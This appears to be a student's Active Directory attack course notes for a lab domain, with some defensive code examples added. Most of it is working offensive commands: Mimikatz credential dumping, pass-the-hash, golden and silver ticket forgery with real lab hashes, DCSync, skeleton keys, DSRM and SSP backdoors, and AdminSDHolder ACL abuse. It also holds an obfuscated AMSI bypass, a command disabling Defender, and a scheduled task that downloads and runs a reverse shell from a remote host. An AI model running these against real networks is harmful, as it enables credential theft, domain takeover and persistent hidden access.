b. It’s the best in PowerShell for passing the hashes, using credentials and executing
commands on multiple remote computers.

# Use Invoke-Command

Invoke-Command -ComputerName ComputerName -ScriptBlock{Command;Another Command}

Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -ScriptBlock{hostname;whoami}

dcorp-adminsrv
dcorp\student181

#Run a function on the remote machine.

Invoke-Command -ComputerName ComputerName -ScriptBlock ${function:name_function}

#Run a script on the remote machine.

Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -FilePath <Path_Script>

Load a script using Invoke-Command in the session (very important)

$sess = New-PSSession -ComputerName ComputerName_Have_Local_Admin_Priv

invoke-Command -FilePath <Script_Path> -Session $sess
Enter-PSSession -Session $sess

Note: when using stateful commands in a session we cannot do it
in parallel on thousands of machines unless we already created
sessions for all of those machines.

Meaning: if you want to execute on more than one machine, you must create more than one session.

What is the difference between ConstrainedLanguage and FullLanguage?

# Run on the remote machine adminsrv.

Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -ScriptBlock{$ExecutionContext.SessionState.LanguageMode}

PSComputerName RunspaceId Value
-------------- ---------- -----
dcorp-adminsrv.dollarcorp.moneycorp.local badb42b9-53d6-4d14-8338-e6869369178a ConstrainedLanguage

Deep_Dive_into_PS_ConstrainedLang

The way to bypass it is in Lab 7.

Invoke-Mimikatz

The script can be used to dump credentials, tickets and more.

It’s very useful for passing and replaying hashes, tickets and for many existing AD
attacks.

The script needs administrator privileges for dumping credentials from the local machine.
Many attacks need specific privileges, which are covered while discussing that attack.

# Dump creds on the local machine

Invoke-Mimikatz -DumpCreds

# Dump creds on multiple machines

Invoke-Mimikatz -DumpCreds -ComputerName @("sys1", "sys2")

# "Over pass the hash ( PTH )" generates tokens from hashes
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:DOMAIN.LOCAL /ntlm:<ntlmhash> /run:powershell.exe"'

Stateful Mimikatz

$sess = New-PSSession -ComputerName SERVER1


# bypass AMSI On Remote Machine
Invoke-Command -Session $sess -ScriptBlock {sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE'
Invoke-Command -Session $sess -FilePath C:\AD\Tools\Invoke-Mimikatz.ps1
Enter-PSSession -Session $sess

Mimikatz & Credentials:

After a user logs on, a variety of credentials are generated and stored in the Local
Security Authority Subsystem Service, LSASS, process in memory. This is meant to
facilitate single sign-on (SSO), ensuring a user isn’t prompted each time resource
access is requested. The credential data may include Kerberos tickets, NTLM password
hashes, LM password hashes (if the password is <15 characters, depending on Windows OS
version and patch level), and even clear-text passwords (to support WDigest and SSP
authentication among others).

To prevent the “clear-text” password from being placed in LSASS, the following registry
key needs to be set to “0” (Digest Disabled):

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD)

What is Pass the Hash ( PtH )?

Authenticate using the NTLM hash without knowing the password, i.e. without cracking the NTLM hash.

What is Over Pass the Hash?

Create a valid Kerberos ticket using the NTLM hash of the user.

Invoke-Mimikatz -Command "sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlmHash> /run:powershel

Very important: follow Lab 7 to understand the idea fully.

Domain Persistence - Golden Ticket - DCSync
Once we have DA privileges, new avenues of persistence, escalation to EA and attacks across
trusts open up!

Kerberos:

Is The basis of authentication in a Windows AD env.

It’s Authentication protocol.

Alternative to NTLM.

Only Works with hostnames , not IP Address .

Preferred over NTLM.

But if i’m Domain Admin ( DA ) i can Access EveryThing 🙂


How Kerberos Works ?

NTLM password hash for Kerberos RC4 encryption.

Logon Ticket (TGT) provides user auth to DC.

Kerberos policy only checked when TGT is created.

DC validates user account only when TGT > 20 mins

Golden Ticket
A golden ticket is signed and encrypted by the hash of krbtgt account which makes it
a valid TGT ticket.

Since user account validation is not done by Domain Controller (KDC service) until
TGT is older than 20 minutes, we can use even deleted/revoked accounts.

The krbtgt user hash could be used to impersonate any user with any privileges from
even a non-domain machine.

Password change has no effect on this attack. If the hash does not match, DC
validates against the previously used password.

This persistent technique is valid as long as the krbtgt hash is not changed twice.

#Running on a DC with DA privs. Extract krbtgt hash.

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<domain.local> /sid:<Domain SID> /krbtgt:<krbtgt hash> /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /aes256:<aes256 key of krbtgt - optional> /ptt"'

klist
ls \\<DC.targetdomain.local>\c$
PsExec64.exe \\DC.targetdomain.com cmd.exe

#Impacket
python ticketer.py -nthash <krbtgt hash> -domain-sid <domain sid> -domain <domain.local> <Anyname>
export KRB5CCNAME=<Anyuser
#psexec
psexec.py <domain.local>/<Anyuser>@<IP> -k -nopass

#First disable Defender real-time monitoring

Set-MpPreference -DisableRealtimeMonitoring $true

# Now go to the svcadmin machine and save a session for computerName dcorp-dc

$sess=New-PSSession -ComputerName dcorp-dc.dollarcorp.moneycorp.local

#Now run this inside dcorp-dc machine
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

Important: NTLM hash of krbtgt → ff46a9d8bd66c6efd77603da26796f35

Get-DomainSID → Domain SID ( S-1-5-21-1874506631-3219952063-538504511 )

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp-moneycorp.local /sid:S-1-5-21-1874506631-3

Now I have a golden ticket for the Administrator user:

klist :

PS C:\AD\Tools> klist

Current LogonId is 0:0xa7e4c

Cached Tickets: (1)

#0> Client: Administrator @ dollarcorp-moneycorp.local


Server: krbtgt/dollarcorp-moneycorp.local @ dollarcorp-moneycorp.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 4/26/2022 18:42:16 (local)
End Time: 4/23/2032 18:42:16 (local)

Renew Time: 5/3/2022 18:42:16 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

ls \\dcorp-dc.dollarcorp.moneycorp.local\c$
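Added example (not from the notes): the klist output above gives the forged TGT away by its dates, a ten-year End Time against a Kerberos policy of 600 minutes. The code below parses klist text into ticket objects and flags any ticket whose lifetime or renew window exceeds the policy values the notes cite as AD defaults (600 and 10080 minutes). The sample input is constructed from the output above, and the "M/d/yyyy H:mm:ss (local)" date format klist printed there is assumed.

```powershell
# Constructed sample, modelled on the klist output in the notes.
$SampleKlist = @'
Current LogonId is 0:0xa7e4c

Cached Tickets: (1)

#0>     Client: Administrator @ dollarcorp-moneycorp.local
        Server: krbtgt/dollarcorp-moneycorp.local @ dollarcorp-moneycorp.local
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 4/26/2022 18:42:16 (local)
        End Time:   4/23/2032 18:42:16 (local)
        Renew Time: 5/3/2022 18:42:16 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:
'@

function ConvertFrom-KlistOutput {
    # Turns klist text into one object per cached ticket, keyed by its "Name: value" lines.
    param([Parameter(Mandatory)][string]$Text)
    $tickets = @()
    $current = $null
    foreach ($line in ($Text -split "`r?`n")) {
        if ($line -match '^#\d+>\s*(?<rest>.*)$') {           # "#0>" starts a new ticket
            if ($null -ne $current) { $tickets += [pscustomobject]$current }
            $current = @{}
            $line = $Matches['rest']
        }
        if ($null -ne $current -and $line -match '^\s*(?<k>[^:]+):\s*(?<v>.*?)\s*$') {
            $current[$Matches['k'].Trim()] = $Matches['v']
        }
    }
    if ($null -ne $current) { $tickets += [pscustomobject]$current }
    return $tickets
}

function ConvertFrom-KlistTime {
    # klist printed "M/d/yyyy H:mm:ss (local)" in the notes; that format is assumed here.
    param([Parameter(Mandatory)][string]$Value)
    [datetime]::ParseExact(($Value -replace '\s*\(local\)\s*$', ''),
        'M/d/yyyy H:mm:ss', [cultureinfo]::InvariantCulture)
}

function Test-TicketLifetime {
    param(
        [Parameter(Mandatory)]$Ticket,
        [int]$MaxTicketMinutes = 600,    # AD default Kerberos policy: 10 hours
        [int]$MaxRenewMinutes  = 10080   # AD default: 7 days
    )
    $start = ConvertFrom-KlistTime $Ticket.'Start Time'
    $end   = ConvertFrom-KlistTime $Ticket.'End Time'
    $findings = @()
    $life = ($end - $start).TotalMinutes
    if ($life -gt $MaxTicketMinutes) {
        $findings += ('lifetime {0:N0} min exceeds policy {1} min' -f $life, $MaxTicketMinutes)
    }
    if ($Ticket.'Renew Time') {
        $renew = (ConvertFrom-KlistTime $Ticket.'Renew Time') - $start
        if ($renew.TotalMinutes -gt $MaxRenewMinutes) {
            $findings += ('renew window {0:N0} min exceeds policy {1} min' -f $renew.TotalMinutes, $MaxRenewMinutes)
        }
    }
    [pscustomobject]@{
        Client     = $Ticket.Client
        Server     = $Ticket.Server
        Encryption = $Ticket.'KerbTicket Encryption Type'
        Suspicious = ($findings.Count -gt 0)
        Findings   = $findings
    }
}

# Run against the sample; on a live host replace $SampleKlist with (klist | Out-String).
ConvertFrom-KlistOutput -Text $SampleKlist | ForEach-Object { Test-TicketLifetime -Ticket $_ }
```

The same lifetime check applies to any ticket source; the client-side view here is only the place where the notes show the forged ticket.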

DCSync Attack
Requires a user with the Replicating Directory Changes All and Replicating Directory Changes privileges.

Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers
groups have these privileges by default. It is also possible for any user to be granted
these specific privileges.
Use the DCSync feature for getting the krbtgt hash: execute the below command with DA
privileges.

#Check rights on the domain object for the current user

#AD Module
Get-ACL "AD:\DC=<domain>,DC=local"
Get-ACL "AD:\DC=<domain>,DC=local" | Select-Object -ExpandProperty Access

#Users with DCSync rights


#Powerview
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ? {($_.IdentityReference -match "studen
Get-ObjectACL -DistinguishedName "dc=domain,dc=local" -ResolveGUIDs | ? {($_.ObjectType -match 'replication-get') -or ($_.Acti

#To Add DCSync permissions, run on DC:


Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName studentx -Rights DCSync
Add-DomainObjectACL -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity <user> -Rights DCSync
#Execute attack
#Mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"' # This attack of DCSync

#Remote execution with impacket


sudo python3 secretsdump.py <domain.local>/<username>:'<pass>'@<IP>

• Using the DCSync option needs no code execution (no need to run Invoke-Mimikatz) on the
target DC.

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

Domain Persistence - Silver Ticket

Silver Ticket → NTLM hash of the service account password

If we have access to the NTLM hash of the service account password we can forge a TGS and use it
on the application server.

Silver Ticket Attack → if we can extract the NTLM hash of a service account we can later on
access the service as any user, including highly privileged users.
Silver Ticket (TGS) → Ticket Granting Service.

Will fail if PAC check is enabled.

The Privileged Attribute Certificate (PAC) is an extension to Kerberos tickets that contains useful information about a user’s privileges. This information is added to Kerberos tickets by a domain controller when a user authenticates within an Active Directory domain. When users use their Kerberos tickets to authenticate to other systems, the PAC can be read and used to determine their level of privileges without reaching out to the domain controller to query for that information (more on that to follow).

Command to forge a silver ticket using the NTLM hash of the service account:

Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:<SID> /target:<ComputerName> /service:CIFS /rc4:<NTLM> /user:Administrator /ptt"'

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-mssql.dollarcorp.moneycorp.local /service:CIFS /rc4:6f5b5acaf7433b3282ac22e21e62ff22 /ptt"'

/target – the target server’s FQDN.

/service – the kerberos service running on the target server. i.e Service Principal Name
class (or type) [cifs, http, mssql,host]

/rc4: NTLM Hash of the Service Account. Mimikatz "privilege::debug" "sekurlsa::logonpasswords"

/domain – the fully qualified domain name.

/sid – the SID of the domain. In this example: “S-1-5-21-1473643419-774954089-2222329127”.

/user – username to impersonate

/groups (optional) – group RIDs the user is a member of (the first is the primary group)
default: 513,512,520,518,519 for the well-known Administrator’s groups (listed below).

/ticket (optional) – provide a path and name for saving the Golden Ticket file to for
later use or use /ptt to immediately inject the golden ticket into memory for use.

/ptt – as an alternate to /ticket – use this to immediately inject the forged ticket
into memory for use.

/id (optional) – user RID. Mimikatz default is 500 (the default Administrator account
RID).

/startoffset (optional) – the start offset when the ticket is available (generally set
to –10 or 0 if this option is used). Mimikatz Default value is 0.

/endin (optional) – ticket lifetime. Mimikatz Default value is 10 years (~5,262,480
minutes). Active Directory default Kerberos policy setting is 10 hours (600 minutes).

/renewmax (optional) – maximum ticket lifetime with renewal. Mimikatz Default value is
10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 7
days (10,080 minutes).

Service Type:

We can create a Silver Ticket via the HOST SPN, which allows scheduling and executing tasks:

#1 Create TGS for HOST service:

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952
/service:HOST /rc4:6f5b5acaf7433b3282ac22e21e62ff22 /ptt"'

#2 List tasks on the DC

schtasks /S dcorp-dc.dollarcorp.moneycorp.local

#3 Create a task to run our reverse shell

schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "Taskname" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://192.168.100.1:8080/Invoke-PowerShellTcp.ps1''')'"

#4 Run the task to get our shell

schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "Taskname"

#5 On the attacker machine, listen with powercat
powercat -l -v -p 443 -t 1000

Skeleton Keys:
Skeleton key is a persistence technique where it is possible to patch a Domain
Controller (LSASS process) so that it allows access as any user with a single password.

Injects Skeleton Key into LSASS

Both real password as well as skeleton key would work.

Get stake-holder permission before testing in engagements as this downgrades security.

Persistent as long as the LSASS service is not restarted [i.e. until a DC reboot; at least 1 month
of time].

One cannot patch LSASS twice with skeleton key. Requires reboot.

You can access other machines as well as long as they authenticate with the DC which has
been patched and the DC is not rebooted.

Default password: mimikatz

Inject a skeleton key on a Domain Controller

• Domain Admin privileges required

Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dcorp-dc.dollarcorp.moneycorp.local

• From a low-priv computer

Enter-PSSession -Computer dcorp-dc.dollarcorp.moneycorp.local -Credential dcorp\administrator

Password → mimikatz
If LSASS is running as a Protected Process.

We can still use Skeleton Key, but it needs the mimikatz driver (mimidriv.sys) on the disk of
the target DC.

Noise in logs [Service installation (kernel mode driver)]

mimikatz # privilege::debug
mimikatz # !+ <- load the driver
mimikatz # !processprotect /process:lsass.exe /remove <- remove the protection
mimikatz # misc::skeleton <- now we can inject it!
mimikatz # !-

Domain Persistence - DSRM AND SSP

What is DSRM?

Directory Services Restore Mode → Safe Mode for any DC.

There is a local administrator on every DC called "Administrator" whose password is the
DSRM password. This is not a domain user but local.

Known Security issue:

DSRM logon is not permitted over network.

Logon behavior needs to be changed first. → We must change it via the registry.

After altering the configuration on the DC, it is possible to:

Pass the NTLM hash of this user to access the DC.

Start a DCSync Attack on the DC to access krbtgt hash

Persistence Lifetime: Extremely long, possibly years.


• Get stake-holder permission before testing in engagements as this downgrades security.

#1 Change Logon Behaviour for DSRM Account

#1
Enter-PSSession -Computername dcorp-dc -> Need Domain Admin

#2
Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -> Check Value of Lsa

#3 Change The value to 2


Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2

#4 If Set-ItemProperty does not set the value (it does not exist yet), create it:

New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD -Verbose

0 (default): You can only use the DSRM administrator account if the DC is started in
DSRM.

1: You can use the DSRM administrator account to log on if the local AD DS service is
stopped.

2: You can always use the DSRM administrator account (This setting isn’t recommended,
because password policies don’t apply to the DSRM administrator account).

Dump DSRM password ( Need DA privs )

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName dcorp-dc


#Or inside mimikatz.exe on the DC
token::elevate
lsadump::sam

# The SAM contains the local user password hashes.

Passing The Hash (PTH)

Note: /domain: is the DC name Not Domain Name

Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:<SAM_DSRM> /run:powershell.exe"'

SAM_DSRM → Found via ( Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName dcorp-dc )
DSRM + DCSync = Password data for any domain account

#Mimikatz
@DSRM -> Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /ru
@DCSync -> Invoke-Mimikatz -Command '"lsadump::dcsync /domain:dollarcorp.moneycorp.local /dc:DCORP-DC /user:dcorp\krbtgt"'

Custom SSP → Security Support Provider:


A Security Support Provider (SSP) is a DLL which provides ways for an application to obtain
an authenticated connection.

Some SSP Packages by Microsoft are:

NTLM

Kerberos

Wdigest

CredSSP

Mimikatz provides a custom SSP -mimilib.dll. This SSP logs local logons, service account
and machine account passwords in clear text on the target server.
DLL can be modified to save into C:\SYSVOL instead. This exposes the log file to all users.

Scenario 1 : Modify Registry [Restart required]

Copy mimilib.dll to the same location as LSASS (c:\windows\system32)

Update Security Packages registry key


(HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\Security Packages) with the
SSP DLL name.

All local logons on the DC are logged to C:\Windows\system32\kiwissp.log

#Supported SSP on DC:


$packages=Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' | select -ExpandProperty 'Security Packages'

$packages+="mimilib"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages

#cmd
shutdown -r

Scenario 2 : Using mimikatz [No restart required]

Not stable with Server 2016

Stored to C:\windows\system32\mimilsa.log

Invoke-Mimikatz -Command '"misc::memssp"'
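Added example (not from the notes): one audit function for the three LSA registry settings this document touches, the WDigest UseLogonCredential value from the Mimikatz & Credentials section, the DsrmAdminLogonBehavior value from the DSRM section, and the two Security Packages lists the custom-SSP scenario writes mimilib into, plus the log files both SSP scenarios create. It assumes an elevated PowerShell on the DC; the package baseline is a constructed list to tune per environment.

```powershell
$LsaKey      = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$OsConfigKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig'
$WDigestKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
# Assumed baseline of names allowed in 'Security Packages'; tune it to the environment.
$ExpectedPackages = @('kerberos', 'msv1_0', 'schannel', 'wdigest', 'tspkg', 'pku2u')

function Get-RegValueOrNull {
    param([Parameter(Mandatory)][string]$Path, [Parameter(Mandatory)][string]$Name)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

function Test-LsaHardening {
    [CmdletBinding()]
    param([string[]]$Baseline = $ExpectedPackages)
    $findings = @()

    # 1. WDigest: UseLogonCredential must be 0 so LSASS does not keep clear-text passwords.
    $wd = Get-RegValueOrNull -Path $WDigestKey -Name 'UseLogonCredential'
    if ($wd -ne 0) {
        $findings += [pscustomobject]@{
            Check    = 'WDigest UseLogonCredential'
            Value    = $(if ($null -eq $wd) { 'absent' } else { $wd })
            Expected = 0
        }
    }

    # 2. DSRM: DsrmAdminLogonBehavior 1 or 2 lets the DSRM Administrator log on outside DSRM.
    $dsrm = Get-RegValueOrNull -Path $LsaKey -Name 'DsrmAdminLogonBehavior'
    if ($null -ne $dsrm -and $dsrm -ne 0) {
        $findings += [pscustomobject]@{ Check = 'DsrmAdminLogonBehavior'; Value = $dsrm; Expected = '0 or absent' }
    }

    # 3. Security Packages: a name outside the baseline (mimilib in the notes) is a custom
    #    SSP that LSASS loads at the next boot; the notes write it to both keys.
    foreach ($key in @($LsaKey, $OsConfigKey)) {
        foreach ($p in @(Get-RegValueOrNull -Path $key -Name 'Security Packages')) {
            if ($p -and ($Baseline -notcontains $p.ToLower())) {
                $dll = Join-Path $env:SystemRoot "System32\$p.dll"
                $findings += [pscustomobject]@{
                    Check    = "Security Packages ($key)"
                    Value    = $p
                    Expected = 'in baseline; DLL on disk: ' + (Test-Path -LiteralPath $dll)
                }
            }
        }
    }

    # 4. Log files that mimilib (kiwissp.log) and misc::memssp (mimilsa.log) write to.
    foreach ($log in @('kiwissp.log', 'mimilsa.log')) {
        $path = Join-Path $env:SystemRoot "System32\$log"
        if (Test-Path -LiteralPath $path) {
            $findings += [pscustomobject]@{ Check = 'SSP log file'; Value = $path; Expected = 'absent' }
        }
    }
    return $findings
}

Test-LsaHardening | Format-Table -AutoSize
```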

Domain Persistence - ACLs - AdminSDHolder
AdminSDHolder
is a container that exists in every Active Directory domain for a special purpose. The
Access Control List (ACL) of the AdminSDHolder object is used as a template to copy
permissions to all “protected groups” in Active Directory and their members. Active
Directory will take the ACL of the AdminSDHolder object and apply it to all protected users and groups
periodically. If an attacker is able to manipulate the ACL for AdminSDHolder, then those
permissions will automatically be applied to all protected objects. This will give an
attacker a way to create persistent access to privileged accounts within the domain.

AdminSDHolder Default Protected Objects:


Account Operators

Administrators

Backup Operators

Domain Admins

Domain Controllers

Enterprise Admins

Krbtgt

Print Operators

Read-only Domain Controllers

Replicator

Schema Admins

Server Operators

Modifying AdminSDHolder Permissions:


With DA privileges add an ACL for our user for AdminSDHolder Permissions. This will
provide the user full control over AdminSDHolder and thus the Protected Groups.

Instead of Full control, we can select ResetPassword, WriteMembers etc.

# ADModule
Set-ADACL -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' -Principal student1 -Verbose

# PowerView
#GenericAll
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights All -Verbose
#ResetPassword
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights ResetPassword -Verbose
#WriteMembers
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights WriteMembers -Verbose

Wait for 1 hour or run Invoke-SDPropagator on the Domain Controller.

1- $sess = New-PSSession -ComputerName dcorp-dc.dollarcorp.moneycorp.local

2- Invoke-Command -FilePath .\Invoke-SDPropagator.ps1 -Session $sess   # uploads the script to the dcorp-dc computer

3- Enter-PSSession -Session $sess

4- Invoke-SDPropagator -showProgress -timeoutMinutes 1 -Verbose


# Check whether the ACE was added, via Get-ObjectAcl
5- Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ? {($_.IdentityReference -match "student1

For pre-Server 2008 machines:


Invoke-SDPropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -Verbose

Abuse Methods:

#Adding a user to Domain Admins Group


#Powerview_dev
Add-DomainGroupMember -Identity 'Domain Admins' -Members testuser -Verbose
#AD-Module
Add-ADGroupMember -Identity 'Domain Admins' -Members testuser

#Resetting a Domain Admin's password


#Powerview_dev
Set-DomainUserPassword -Identity testuser -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose
#AD-Module
Set-ADAccountPassword -Identity testuser -NewPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose

DCSync:
Three special rights are enough for DCSync privileges; with them we can extract NTLM
hashes without any DA privileges.

#Add FullControl Rights:


#ActiveDirectoryModule and Set-ADACL.ps1
Set-ADACL -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Principal studentx -Verbose
#Powerview
Add-ObjectAcl -TargetDistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalSamAccountName studentx -Rights All -Verbose

#DCSync Rights
#Powerview
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ? {($_.IdentityReference -match "studentx")
# Add To DCSync Rights
Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName <studentx> -Rights DCSync -Verbose

#ADModule and Set-ADACL


Set-ADACL -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Principal studentx -GUIDRight DCSync -Verbose

Execute DCSync Without Domain Admin Privileges:

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

Domain Persistence - ACLs - Security Descriptors

When we have local admin privileges on the box, it is possible to modify the Security
Descriptor (Owner, Primary Group, DACL and SACL) of multiple remote access methods, which are
securable objects, to allow access to non-admin users.
SDDL (Security Descriptor Definition Language) is used to describe a Security Descriptor.

SDDL uses ACE strings for the DACL and SACL.
ACE string format:

ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;(resource_attribute)
# Example: ACE for the built-in Administrator on a WMI namespace
A;CI;CCDCLCSWRPWPRCWD;;;SID
A -> Allow
CI -> CONTAINER_INHERIT
CCDCLCSWRPWPRCWD -> each two-letter code is a different right; together they give full control over the namespace.
If the SID is replaced with a user's SID, that user will have full control over the namespace.
Reference
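To make the ACE string format concrete from the defender's side, here is an added example (not code from the notes) that parses SDDL ACE strings into named rights and flags any Allow ACE that hands control-type rights to a SID outside a trusted set. The DACL and the SID S-1-5-21-1-2-3-1105 are constructed; the same check applies to the AdminSDHolder DACL discussed earlier.

```python
"""Parse SDDL ACE strings and flag grants to unexpected principals.

Added example for these notes, not code from the original. The ACE strings used here
are constructed; S-1-5-21-1-2-3-1105 is a placeholder for a non-admin user's SID.
"""
import re
from dataclasses import dataclass
from typing import List

ACE_TYPES = {"A": "Allow", "D": "Deny", "OA": "ObjectAllow", "OD": "ObjectDeny", "AU": "Audit"}
ACE_FLAGS = {"CI": "ContainerInherit", "OI": "ObjectInherit", "NP": "NoPropagateInherit",
             "IO": "InheritOnly", "ID": "Inherited", "SA": "SuccessfulAccess",
             "FA": "FailedAccess"}
# Two-letter SDDL rights codes (directory-service and generic rights).
RIGHTS = {"CC": "CreateChild", "DC": "DeleteChild", "LC": "ListChildren", "SW": "Self",
          "RP": "ReadProperty", "WP": "WriteProperty", "DT": "DeleteTree", "LO": "ListObject",
          "CR": "ControlAccess", "SD": "Delete", "RC": "ReadControl", "WD": "WriteDAC",
          "WO": "WriteOwner", "GA": "GenericAll", "GR": "GenericRead", "GW": "GenericWrite",
          "GX": "GenericExecute"}
# Rights that let the holder change the object or its ACL; a non-admin SID holding any of
# them on a WMI namespace or on AdminSDHolder is the persistence the notes describe.
CONTROL_RIGHTS = {"WriteDAC", "WriteOwner", "GenericAll", "GenericWrite", "WriteProperty",
                  "ControlAccess"}
# Well-known SID aliases expected to hold control rights (SYSTEM, Builtin/Domain/Enterprise
# Admins, local Administrator).
TRUSTED_SIDS = {"SY", "BA", "DA", "EA", "LA"}


@dataclass
class Ace:
    ace_type: str
    flags: List[str]
    rights: List[str]
    object_guid: str
    inherit_object_guid: str
    sid: str


def _codes(field: str, table: dict, what: str) -> List[str]:
    """Translate a run of two-letter codes (e.g. 'CCDCLC') into names; reject unknown ones."""
    if len(field) % 2:
        raise ValueError(f"odd-length {what} field: {field!r}")
    names = []
    for i in range(0, len(field), 2):
        code = field[i:i + 2]
        if code not in table:
            raise ValueError(f"unknown {what} code {code!r}")
        names.append(table[code])
    return names


def parse_ace(ace: str) -> Ace:
    """Parse 'type;flags;rights;object_guid;inherit_object_guid;sid' (parentheses optional)."""
    body = ace.strip()
    if body.startswith("(") and body.endswith(")"):
        body = body[1:-1]
    parts = body.split(";")
    if len(parts) < 6:
        raise ValueError(f"ACE needs at least 6 fields: {ace!r}")
    ace_type, flags, rights, oguid, iguid, sid = parts[:6]
    if ace_type not in ACE_TYPES:
        raise ValueError(f"unknown ACE type {ace_type!r}")
    # Rights may also be a hex mask (e.g. 0x1f01ff); keep it verbatim in that case.
    right_names = [rights] if rights.lower().startswith("0x") else _codes(rights, RIGHTS, "rights")
    return Ace(ACE_TYPES[ace_type], _codes(flags, ACE_FLAGS, "flags"), right_names,
               oguid, iguid, sid)


def parse_dacl(sddl: str) -> List[Ace]:
    """Parse the DACL section of an SDDL string, e.g. 'D:PAI(A;;GA;;;BA)(A;CI;...;;;S-1-5-...)'."""
    start = sddl.find("D:")
    if start < 0:
        raise ValueError("no DACL (D:) section in SDDL string")
    end = sddl.find("S:", start)  # an optional SACL section follows the DACL
    section = sddl[start:end if end > start else None]
    return [parse_ace(m) for m in re.findall(r"\(([^)]*)\)", section)]


def unexpected_grants(aces: List[Ace], trusted=TRUSTED_SIDS) -> List[Ace]:
    """Allow ACEs that give control-type rights to a principal outside the trusted set."""
    return [a for a in aces
            if a.ace_type in ("Allow", "ObjectAllow")
            and a.sid not in trusted
            and (set(a.rights) & CONTROL_RIGHTS)]


if __name__ == "__main__":
    # Constructed DACL: the built-in Administrators ACE from the notes, a user SID given the
    # same full-control right set (what Set-RemoteWMI adds), and a harmless read-only ACE.
    dacl = ("D:(A;CI;CCDCLCSWRPWPRCWD;;;BA)"
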